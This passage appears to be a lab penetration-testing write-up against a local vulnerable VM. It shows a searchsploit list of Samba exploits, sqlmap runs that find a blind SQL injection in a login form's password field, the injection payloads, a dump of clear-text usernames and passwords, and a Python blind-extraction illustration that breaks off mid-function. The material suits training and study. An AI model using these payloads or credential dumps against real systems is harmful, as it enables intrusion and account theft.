Processed Requests: 3024
Filtered Requests: 3017
Requests/sec.: 531.7226
2.5.6 searchsploit search for Samba exploits
┌──(root㉿kali)-[/home/kali]
└─# searchsploit samba 3.
------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Meta | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit) | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Met | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow | linux/dos/27778.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
Sambar Server 4.3/4.4 Beta 3 - Search CGI | windows/remote/20223.txt
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access | windows/remote/24163.txt
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
III. Penetration Testing
3.1 SQL injection
3.1.1 Capturing the login request with Burp Suite
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# vim sql.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# cat sql.txt
POST /checklogin.php HTTP/1.1
Host: 192.168.1.6
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.6
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.6/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
myusername=admin&mypassword=123456&Submit=Login
3.1.2 Enumerating the databases
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:35:59 /2024-06-12/
[09:35:59] [INFO] parsing HTTP request from 'sql.txt'
[09:36:00] [INFO] testing connection to the target URL
[09:36:00] [INFO] testing if the target URL content is stable
[09:36:00] [INFO] target URL content is stable
[09:36:00] [INFO] testing if POST parameter 'myusername' is dynamic
[09:36:00] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[09:36:00] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[09:36:00] [INFO] testing for SQL injection on POST parameter 'myusername'
[09:36:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[09:36:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:36:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:36:01] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[09:36:01] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[09:36:02] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:36:02] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[09:36:02] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[09:36:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[09:36:04] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[09:36:04] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[09:36:05] [INFO] testing 'Oracle error-based - Parameter replace'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:36:05] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[09:36:05] [INFO] testing 'Generic inline queries'
[09:36:05] [INFO] testing 'MySQL inline queries'
[09:36:05] [INFO] testing 'PostgreSQL inline queries'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:36:05] [INFO] testing 'Oracle inline queries'
[09:36:05] [INFO] testing 'SQLite inline queries'
[09:36:06] [INFO] testing 'Firebird inline queries'
[09:36:06] [INFO] testing 'ClickHouse inline queries'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:36:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:36:06] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[09:36:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:36:07] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:36:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[09:36:08] [INFO] testing 'Oracle AND time-based blind'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[09:36:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:36:09] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[09:36:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:36:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:36:10] [WARNING] POST parameter 'myusername' does not seem to be injectable
[09:36:10] [INFO] testing if POST parameter 'mypassword' is dynamic
[09:36:10] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[09:36:10] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[09:36:10] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:36:10] [INFO] POST parameter 'mypassword' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="28")
[09:36:10] [INFO] testing 'Generic inline queries'
[09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
got a 302 redirect to 'http://192.168.1.6/login_success.php?username=admin'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:36:10] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:36:10] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:36:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:36:10] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:36:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:10] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:36:11] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:36:11] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:36:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL inline queries'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:21] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:36:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:36:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:36:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:36:21] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[09:36:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:23] [INFO] testing 'Generic UNION query (59) - 21 to 40 columns'
[09:36:23] [INFO] testing 'Generic UNION query (59) - 41 to 60 columns'
[09:36:23] [INFO] testing 'MySQL UNION query (59) - 1 to 20 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 21 to 40 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 41 to 60 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 61 to 80 columns'
[09:36:25] [INFO] testing 'MySQL UNION query (59) - 81 to 100 columns'
[09:36:25] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1473 HTTP(s) requests:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:36:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:36:25] [INFO] fetching database names
[09:36:25] [INFO] fetching number of databases
[09:36:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:36:25] [INFO] retrieved: 3
[09:36:25] [INFO] retrieved: information_schema
[09:36:26] [INFO] retrieved: members
[09:36:26] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql
[09:36:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 09:36:27 /2024-06-12/
sqlmap reports the POST parameter mypassword as injectable (boolean-based blind and time-based blind), while myusername is not, and enumerates three databases:
- information_schema
- members
- mysql
3.1.3 Current database
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 --current-db
[*] starting @ 09:42:14 /2024-06-12/
[09:42:14] [INFO] parsing HTTP request from 'sql.txt'
[09:42:15] [INFO] resuming back-end DBMS 'mysql'
[09:42:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:42:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:42:15] [INFO] fetching current database
[09:42:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:42:15] [INFO] retrieved: members
current database: 'members'
[09:42:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 09:42:15 /2024-06-12/
The database the application is connected to is:
- members
3.1.4 Tables in the current database
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members --tables
[*] starting @ 09:45:10 /2024-06-12/
[09:45:10] [INFO] parsing HTTP request from 'sql.txt'
[09:45:10] [INFO] resuming back-end DBMS 'mysql'
[09:45:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:45:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:45:11] [INFO] fetching tables for database: 'members'
[09:45:11] [INFO] fetching number of tables for database 'members'
[09:45:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:45:11] [INFO] retrieved: 1
[09:45:11] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+
[09:45:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 09:45:11 /2024-06-12/
Database in use: members
Table: members
3.1.5 Column names
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members -T members --columns
[*] starting @ 09:48:22 /2024-06-12/
[09:48:22] [INFO] parsing HTTP request from 'sql.txt'
[09:48:22] [INFO] resuming back-end DBMS 'mysql'
[09:48:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:48:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:48:22] [INFO] fetching columns for table 'members' in database 'members'
[09:48:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:48:22] [INFO] retrieved: 3
[09:48:22] [INFO] retrieved: id
[09:48:23] [INFO] retrieved: int(4)
[09:48:23] [INFO] retrieved: username
[09:48:23] [INFO] retrieved: varchar(65)
[09:48:24] [INFO] retrieved: password
[09:48:24] [INFO] retrieved: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
[09:48:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 09:48:25 /2024-06-12/
Columns found:
- id
- password
- username
3.1.6 Usernames and passwords
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members -T members -C id,username,password --dump
[*] starting @ 09:52:26 /2024-06-12/
[09:52:26] [INFO] parsing HTTP request from 'sql.txt'
[09:52:26] [INFO] resuming back-end DBMS 'mysql'
[09:52:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:52:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:52:26] [INFO] fetching entries of column(s) 'id,password,username' for table 'members' in database 'members'
[09:52:26] [INFO] fetching number of column(s) 'id,password,username' entries for table 'members' in database 'members'
[09:52:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:52:26] [INFO] retrieved: 2
[09:52:26] [INFO] retrieved: 1
[09:52:26] [INFO] retrieved: MyNameIsJohn
[09:52:27] [INFO] retrieved: john
[09:52:27] [INFO] retrieved: 2
[09:52:27] [INFO] retrieved: ADGAds
[09:52:28] [INFO] retrieved:
[09:52:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[09:52:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:52:43] [INFO] adjusting time delay to 1 second due to good response times
robert
Database: members
Table: members
[2 entries]
+----+----------+--------------+
| id | username | password |
+----+----------+--------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAds |
+----+----------+--------------+
Usernames and passwords recovered (the passwords are stored in clear text, which is why the dump can be used for SSH as-is):
| Username | Password     |
|----------|--------------|
| john     | MyNameIsJohn |
| robert   | ADGAds       |
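The following script is an added illustration, not part of the original write-up and not sqlmap's code. It reproduces what sqlmap did against checklogin.php: it models the login query the way the PHP source in 3.3.3 builds it (username escaped, password concatenated raw), drives a yes/no oracle through the mypassword field, and recovers a cell character by character with a binary search over ASCII codes, which is exactly how a boolean-based blind extraction works. SQLite stands in for the target's MySQL so the script runs offline; its substr()/unicode()/length() correspond to MySQL's SUBSTRING()/ASCII()/LENGTH(). The seed rows are copied from the dump above; the BlindClient class and the hardened checklogin_fixed variant are this example's own.

```python
import sqlite3

# Constructed stand-in for the target's members.members table (values taken
# from the sqlmap dump). SQLite replaces MySQL so the script runs offline.
SEED_ROWS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAds")]


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?, ?)", SEED_ROWS)
    return con


def checklogin_vulnerable(con, myusername, mypassword):
    """Mirrors checklogin.php: username is escaped, password is concatenated raw."""
    safe_user = myusername.replace("'", "''")   # stand-in for mysql_real_escape_string()
    sql = (f"SELECT * FROM members WHERE username='{safe_user}' "
           f"and password='{mypassword}'")
    try:
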